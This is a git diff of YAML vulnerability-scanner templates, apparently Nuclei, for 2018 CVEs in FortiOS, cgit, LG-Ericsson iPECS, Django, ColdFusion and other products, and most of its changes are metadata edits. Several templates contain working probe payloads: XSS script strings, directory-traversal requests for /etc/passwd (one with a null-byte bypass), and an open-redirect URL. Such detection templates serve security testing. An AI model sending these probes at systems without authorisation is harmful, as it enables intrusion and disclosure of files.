cve-id: CVE-2018-13379 + cwe-id: CWE-22 + tags: cve,cve2018,fortios requests: - method: GET @@ -23,3 +24,5 @@ requests: - type: word words: - "var fgt_lang" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-13380.yaml b/cves/2018/CVE-2018-13380.yaml index 96cfe5534c..ec56ed0b24 100644 --- a/cves/2018/CVE-2018-13380.yaml +++ b/cves/2018/CVE-2018-13380.yaml @@ -2,34 +2,40 @@ id: CVE-2018-13380 info: name: Fortinet FortiOS Cross-Site Scripting - author: shelld3v + author: shelld3v,AaronChen0 severity: medium description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380 - tags: cve,cve2018,fortios,xss + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-13380 + - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html + - https://fortiguard.com/advisory/FG-IR-18-383 + - https://fortiguard.com/advisory/FG-IR-20-230 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-13380 cwe-id: CWE-79 + tags: cve,cve2018,fortios,xss,fortinet requests: - method: GET path: - - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E" + - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B" - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E" matchers-condition: and matchers: - type: word + part: body words: - "" - part: body + - "" + condition: or - type: word + part: header words: - "application/json" - part: header negative: true - type: status diff --git a/cves/2018/CVE-2018-13980.yaml b/cves/2018/CVE-2018-13980.yaml index 3f6afd77f7..fd9ee56799 100644 --- a/cves/2018/CVE-2018-13980.yaml +++ b/cves/2018/CVE-2018-13980.yaml @@ -1,19 +1,21 @@ id: CVE-2018-13980 info: - name: Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure + name: Zeta Producer Desktop CMS 14.2.0 - Arbitrary File Retrieval author: wisnupramoedya severity: medium description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. reference: - https://www.exploit-db.com/exploits/45016 - https://nvd.nist.gov/vuln/detail/CVE-2018-13980 - tags: cve,cve2018,lfi + - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/ + - http://packetstormsecurity.com/files/148537/Zeta-Producer-Desktop-CMS-14.2.0-Code-Execution-File-Disclosure.html classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.50 + cvss-score: 5.5 cve-id: CVE-2018-13980 cwe-id: CWE-22 + tags: cve,cve2018,lfi requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2018/CVE-2018-14013.yaml b/cves/2018/CVE-2018-14013.yaml index cee7520213..443cec53b7 100644 --- a/cves/2018/CVE-2018-14013.yaml +++ b/cves/2018/CVE-2018-14013.yaml @@ -5,13 +5,17 @@ info: author: pikpikcu severity: medium description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013 - tags: cve,cve2018,xss,zimbra + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-14013 + - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories + - https://bugzilla.zimbra.com/show_bug.cgi?id=109018 + - https://bugzilla.zimbra.com/show_bug.cgi?id=109017 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-14013 cwe-id: CWE-79 + tags: cve,cve2018,xss,zimbra requests: - method: GET diff --git a/cves/2018/CVE-2018-14064.yaml b/cves/2018/CVE-2018-14064.yaml index f3452b953f..d8cf45f3a7 100644 --- a/cves/2018/CVE-2018-14064.yaml +++ b/cves/2018/CVE-2018-14064.yaml @@ -4,17 +4,17 @@ info: name: VelotiSmart Wifi - Directory Traversal author: 0x_Akoko severity: critical - description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80. + description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80. reference: - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - https://www.exploit-db.com/exploits/45030 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 - tags: cve,cve2018,lfi,camera,iot classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-14064 cwe-id: CWE-22 + tags: cve,cve2018,lfi,camera,iot requests: - method: GET @@ -31,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-14574.yaml b/cves/2018/CVE-2018-14574.yaml index 18f87e359a..1ae3602c19 100644 --- a/cves/2018/CVE-2018-14574.yaml +++ b/cves/2018/CVE-2018-14574.yaml @@ -4,13 +4,7 @@ info: name: Django Open Redirect author: pikpikcu severity: medium - tags: cve,cve2018,django,redirect - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-14574 - cwe-id: CWE-601 - description: "django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect." + description: django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect. reference: - https://www.djangoproject.com/weblog/2018/aug/01/security-releases/ - https://usn.ubuntu.com/3726-1/ @@ -18,6 +12,12 @@ info: - https://www.debian.org/security/2018/dsa-4264 - http://www.securityfocus.com/bid/104970 - https://access.redhat.com/errata/RHSA-2019:0265 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-14574 + cwe-id: CWE-601 + tags: cve,cve2018,django,redirect requests: - method: GET diff --git a/cves/2018/CVE-2018-14728.yaml b/cves/2018/CVE-2018-14728.yaml index 0eaff41a52..ab3eb88100 100644 --- a/cves/2018/CVE-2018-14728.yaml +++ b/cves/2018/CVE-2018-14728.yaml @@ -1,19 +1,20 @@ id: CVE-2018-14728 info: - name: Responsive filemanager 9.13.1 - SSRF/LFI + name: Responsive filemanager 9.13.1 Server-Side Request Forgery author: madrobot severity: critical - tags: cve,cve2018,ssrf,lfi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-14728 - cwe-id: CWE-918 - description: "upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter." + description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter. reference: - http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html - https://www.exploit-db.com/exploits/45103/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-14728 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-14728 + cwe-id: CWE-918 + tags: cve,cve2018,ssrf,lfi requests: - method: POST @@ -27,3 +28,5 @@ requests: regex: - "root:.*:0:0:" part: body + +# Enhanced by mp on 2022/04/01 diff --git a/cves/2018/CVE-2018-14912.yaml b/cves/2018/CVE-2018-14912.yaml new file mode 100644 index 0000000000..ccb43cade4 --- /dev/null +++ b/cves/2018/CVE-2018-14912.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-14912 + +info: + name: cgit < 1.2.1 Directory Traversal + author: 0x_Akoko + severity: high + description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request. + reference: + - https://cxsecurity.com/issue/WLB-2018080034 + - https://nvd.nist.gov/vuln/detail/CVE-2018-14912 + - https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html + - https://bugs.chromium.org/p/project-zero/issues/detail?id=1627 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-14912 + cwe-id: CWE-22 + tags: cve,cve2018,cgit,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/18 diff --git a/cves/2018/CVE-2018-14916.yaml b/cves/2018/CVE-2018-14916.yaml index 984ff08fd7..5f54fb11ce 100644 --- a/cves/2018/CVE-2018-14916.yaml +++ b/cves/2018/CVE-2018-14916.yaml @@ -1,15 +1,18 @@ id: CVE-2018-14916 + info: - name: Loytec LGATE-902 Directory Traversal + name: Loytec LGATE-902 <6.4.2 - Local File Inclusion author: 0x_Akoko severity: critical - description: Loytec LGATE-902 versions prior to 6.4.2 suffer from cross site scripting, arbitrary file deletion, and directory traversal vulnerabilities. + description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html - https://nvd.nist.gov/vuln/detail/CVE-2018-14916 + - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html + - https://seclists.org/fulldisclosure/2019/Apr/12 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H - cvss-score: 9.4 + cvss-score: 9.1 cve-id: CVE-2018-14916 cwe-id: CWE-732 tags: cve,cve2018,loytec,lfi @@ -29,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-14931.yaml b/cves/2018/CVE-2018-14931.yaml new file mode 100644 index 0000000000..babdd309c5 --- /dev/null +++ b/cves/2018/CVE-2018-14931.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-14931 + +info: + name: Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect + author: 0x_Akoko + severity: medium + description: Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI. + reference: + - https://neetech18.blogspot.com/2019/03/polaris-intellect-core-banking-software_31.html + - https://www.cvedetails.com/cve/CVE-2018-14931 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-14931 + cwe-id: CWE-601 + tags: cve,cve2018,redirect,polarisft,intellect + +requests: + - method: GET + + path: + - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.example.com' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-15138.yaml b/cves/2018/CVE-2018-15138.yaml new file mode 100644 index 0000000000..cca957188f --- /dev/null +++ b/cves/2018/CVE-2018-15138.yaml @@ -0,0 +1,34 @@ +id: CVE-2018-15138 + +info: + name: LG-Ericsson iPECS NMS 30M Directory Traversal + author: 0x_Akoko + severity: high + description: Ericsson-LG iPECS NMS 30M allows directory traversal via ipecs-cm/download?filename=../ URIs. + reference: + - https://cxsecurity.com/issue/WLB-2018080070 + - https://nvd.nist.gov/vuln/detail/CVE-2018-15138 + - https://www.exploit-db.com/exploits/45167/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-15138 + cwe-id: CWE-22 + tags: cve,cve2018,ericsson,lfi,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data" + - "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/cves/2018/CVE-2018-15473.yaml b/cves/2018/CVE-2018-15473.yaml index 9fa15ec402..c6d6648529 100644 --- a/cves/2018/CVE-2018-15473.yaml +++ b/cves/2018/CVE-2018-15473.yaml @@ -5,18 +5,22 @@ info: author: r3dg33k,daffainfo,forgedhallpass severity: medium description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 - tags: network,openssh,cve,cve2018 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 + - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 + - https://bugs.debian.org/906236 + - http://www.openwall.com/lists/oss-security/2018/08/15/5 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2018-15473 cwe-id: CWE-362 + tags: network,openssh,cve,cve2018 network: - host: - "{{Hostname}}" - - "{{Hostname}}:22" + - "{{Host}}:22" matchers: - type: regex diff --git a/cves/2018/CVE-2018-15517.yaml b/cves/2018/CVE-2018-15517.yaml index a6c7089cc6..8e37ed929f 100644 --- a/cves/2018/CVE-2018-15517.yaml +++ b/cves/2018/CVE-2018-15517.yaml @@ -1,18 +1,21 @@ id: CVE-2018-15517 info: - name: D-LINK Central WifiManager - SSRF - description: Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser. - reference: - - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt + name: D-Link Central WifiManager - Server-Side Request Forgery author: gy741 severity: high - tags: cve,cve2018,dlink,ssrf,oast + description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser. + reference: + - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517 + - http://seclists.org/fulldisclosure/2018/Nov/28 + - http://packetstormsecurity.com/files/150243/D-LINK-Central-WifiManager-CWM-100-1.03-r0098-Server-Side-Request-Forgery.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N - cvss-score: 8.60 + cvss-score: 8.6 cve-id: CVE-2018-15517 cwe-id: CWE-918 + tags: cve,cve2018,dlink,ssrf,oast requests: - method: GET @@ -24,3 +27,5 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/04/06 diff --git a/cves/2018/CVE-2018-15535.yaml b/cves/2018/CVE-2018-15535.yaml index 2304115e39..ee9978be79 100644 --- a/cves/2018/CVE-2018-15535.yaml +++ b/cves/2018/CVE-2018-15535.yaml @@ -8,12 +8,14 @@ info: reference: - https://www.exploit-db.com/exploits/45271 - https://www.cvedetails.com/cve/CVE-2018-15535 - tags: cve,cve2018,lfi + - http://seclists.org/fulldisclosure/2018/Aug/34 + - https://www.exploit-db.com/exploits/45271/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-15535 cwe-id: CWE-22 + tags: cve,cve2018,lfi requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2018/CVE-2018-15745.yaml b/cves/2018/CVE-2018-15745.yaml index 5b249a3069..d271e88968 100644 --- a/cves/2018/CVE-2018-15745.yaml +++ b/cves/2018/CVE-2018-15745.yaml @@ -5,13 +5,16 @@ info: author: gy741 severity: high description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter. - reference: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt - tags: cve,cve2018,argussurveillance,lfi + reference: + - http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt + - http://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.html + - https://www.exploit-db.com/exploits/45296/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-15745 cwe-id: CWE-22 + tags: cve,cve2018,argussurveillance,lfi requests: - method: GET diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index fc6dc72993..8c9d54e30e 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -1,19 +1,23 @@ id: CVE-2018-15961 info: - name: Adobe ColdFusion Unrestricted File Upload RCE + name: Adobe ColdFusion - Unrestricted File Upload Remote Code Execution author: SkyLark-Lab,ImNightmaree severity: critical description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 - https://github.com/xbufu/CVE-2018-15961 - tags: cve,cve2018,adobe,rce,coldfusion,fileupload + - https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html + - http://www.securitytracker.com/id/1041621 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-15961 cwe-id: CWE-434 + metadata: + shodan-query: http.component:"Adobe ColdFusion" + tags: cve,cve2018,adobe,rce,coldfusion,fileupload requests: - raw: @@ -63,3 +67,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/22 diff --git a/cves/2018/CVE-2018-16059.yaml b/cves/2018/CVE-2018-16059.yaml index 2511f58f0e..e8d7c3e39e 100644 --- a/cves/2018/CVE-2018-16059.yaml +++ b/cves/2018/CVE-2018-16059.yaml @@ -4,16 +4,18 @@ info: name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal author: daffainfo severity: medium + description: Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-16059 - https://www.exploit-db.com/exploits/45342 - tags: cve,cve2018,iot,lfi + - https://www.exploit-db.com/exploits/45342/ + - https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2018-16059 cwe-id: CWE-22 - description: "Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter." + tags: cve,cve2018,iot,lfi requests: - method: POST @@ -25,7 +27,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status diff --git a/cves/2018/CVE-2018-16133.yaml b/cves/2018/CVE-2018-16133.yaml index 6acefb5047..7e54e984da 100644 --- a/cves/2018/CVE-2018-16133.yaml +++ b/cves/2018/CVE-2018-16133.yaml @@ -1,4 +1,5 @@ id: CVE-2018-16133 + info: name: Cybrotech CyBroHttpServer 1.0.3 Directory Traversal author: 0x_Akoko @@ -8,6 +9,7 @@ info: - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html - http://www.cybrotech.com/ - https://www.cvedetails.com/cve/CVE-2018-16133 + - https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 diff --git a/cves/2018/CVE-2018-16167.yaml b/cves/2018/CVE-2018-16167.yaml index 905c2aa927..11a6ae97f3 100644 --- a/cves/2018/CVE-2018-16167.yaml +++ b/cves/2018/CVE-2018-16167.yaml @@ -1,19 +1,21 @@ id: CVE-2018-16167 info: - name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated) + name: LogonTracer <=1.2.0 - Remote Command Injection author: gy741 severity: critical description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. reference: - https://www.exploit-db.com/exploits/49918 - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 - tags: cve,cve2018,logontracer,rce,oast + - https://jvn.jp/en/vu/JVNVU98026636/index.html + - https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-16167 cwe-id: CWE-78 + tags: cve,cve2018,logontracer,rce,oast requests: - raw: @@ -30,3 +32,5 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-16283.yaml b/cves/2018/CVE-2018-16283.yaml index 5da2280652..4c485ff4b7 100644 --- a/cves/2018/CVE-2018-16283.yaml +++ b/cves/2018/CVE-2018-16283.yaml @@ -4,16 +4,18 @@ info: name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion author: 0x240x23elu severity: critical + description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 - https://www.exploit-db.com/exploits/45438 - tags: cve,cve2018,wordpress,wp-plugin,lfi + - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 + - https://github.com/springjk/wordpress-wechat-broadcast/issues/14 + - http://seclists.org/fulldisclosure/2018/Sep/32 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-16283 cwe-id: CWE-22 - description: "The Wechat Broadcast plugin 1.2.0 and earlier for WordPress allows Directory Traversal via the Image.php url parameter." + tags: cve,cve2018,wordpress,wp-plugin,lfi requests: - method: GET @@ -25,3 +27,5 @@ requests: regex: - "root:.*:0:0:" part: body + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-16288.yaml b/cves/2018/CVE-2018-16288.yaml index d74869f104..e90a28a2aa 100644 --- a/cves/2018/CVE-2018-16288.yaml +++ b/cves/2018/CVE-2018-16288.yaml @@ -8,12 +8,14 @@ info: reference: - https://www.exploit-db.com/exploits/45440 - https://www.cvedetails.com/cve/CVE-2018-16288 - tags: cve,cve2018,lfi + - http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html + - https://www.exploit-db.com/exploits/45440/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.60 + cvss-score: 8.6 cve-id: CVE-2018-16288 cwe-id: CWE-200 + tags: cve,cve2018,lfi requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2018/CVE-2018-16299.yaml b/cves/2018/CVE-2018-16299.yaml index 08a387bb74..1f6e3c1e20 100644 --- a/cves/2018/CVE-2018-16299.yaml +++ b/cves/2018/CVE-2018-16299.yaml @@ -5,13 +5,17 @@ info: author: 0x_Akoko,0x240x23elu severity: high description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter. - reference: https://www.exploit-db.com/exploits/45439 - tags: wordpress,cve2018,cve,lfi + reference: + - https://www.exploit-db.com/exploits/45439 + - https://www.exploit-db.com/exploits/45439/ + - https://packetstormsecurity.com/files/149433/WordPress-Localize-My-Post-1.0-Local-File-Inclusion.html + - https://github.com/julianburr/wp-plugin-localizemypost/issues/1 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-16299 cwe-id: CWE-22 + tags: wordpress,cve2018,cve,lfi,plugin requests: - method: GET @@ -23,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2018/CVE-2018-16341.yaml b/cves/2018/CVE-2018-16341.yaml index ebc296d3da..03c9ed3efd 100644 --- a/cves/2018/CVE-2018-16341.yaml +++ b/cves/2018/CVE-2018-16341.yaml @@ -5,7 +5,9 @@ info: author: madrobot severity: high description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI - tags: cve,cve2018,nuxeo,ssti,rce + classification: + cve-id: CVE-2018-16341 + tags: cve,cve2018,nuxeo,ssti,rce,bypass requests: - method: GET @@ -15,4 +17,4 @@ requests: - type: word words: - "31333333337" - part: body \ No newline at end of file + part: body diff --git a/cves/2018/CVE-2018-16668.yaml b/cves/2018/CVE-2018-16668.yaml index 76cc91f0bd..a4af5ea5ac 100644 --- a/cves/2018/CVE-2018-16668.yaml +++ b/cves/2018/CVE-2018-16668.yaml @@ -2,17 +2,19 @@ id: CVE-2018-16668 info: name: CirCarLife SCADA Installation Paths + author: geeknik + severity: medium description: System software installation path disclosure due to lack of authentication reference: - https://www.exploit-db.com/exploits/45384 - author: geeknik - severity: medium - tags: cve,cve2018,circarlife,scada,iot,disclosure + - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life + - https://www.exploit-db.com/exploits/45384/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2018-16668 cwe-id: CWE-287 + tags: cve,cve2018,circarlife,scada,iot,disclosure requests: - method: GET diff --git a/cves/2018/CVE-2018-16670.yaml b/cves/2018/CVE-2018-16670.yaml index b253aecfda..bf69edf1c7 100644 --- a/cves/2018/CVE-2018-16670.yaml +++ b/cves/2018/CVE-2018-16670.yaml @@ -2,17 +2,19 @@ id: CVE-2018-16670 info: name: CirCarLife SCADA PLC Status + author: geeknik + severity: medium description: PLC status disclosure due to lack of authentication reference: - https://www.exploit-db.com/exploits/45384 - author: geeknik - severity: medium - tags: cve,cve2018,circarlife,scada,plc,iot,disclosure + - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life + - https://www.exploit-db.com/exploits/45384/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2018-16670 cwe-id: CWE-287 + tags: cve,cve2018,circarlife,scada,plc,iot,disclosure requests: - method: GET diff --git a/cves/2018/CVE-2018-16671.yaml b/cves/2018/CVE-2018-16671.yaml index 2457153b08..9a3d84bf1d 100644 --- a/cves/2018/CVE-2018-16671.yaml +++ b/cves/2018/CVE-2018-16671.yaml @@ -2,17 +2,19 @@ id: CVE-2018-16671 info: name: CirCarLife SCADA Device ID + author: geeknik + severity: medium description: System software information disclosure due to lack of authentication reference: - https://www.exploit-db.com/exploits/45384 - author: geeknik - severity: medium - tags: cve,cve2018,circarlife,scada,iot,disclosure + - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life + - 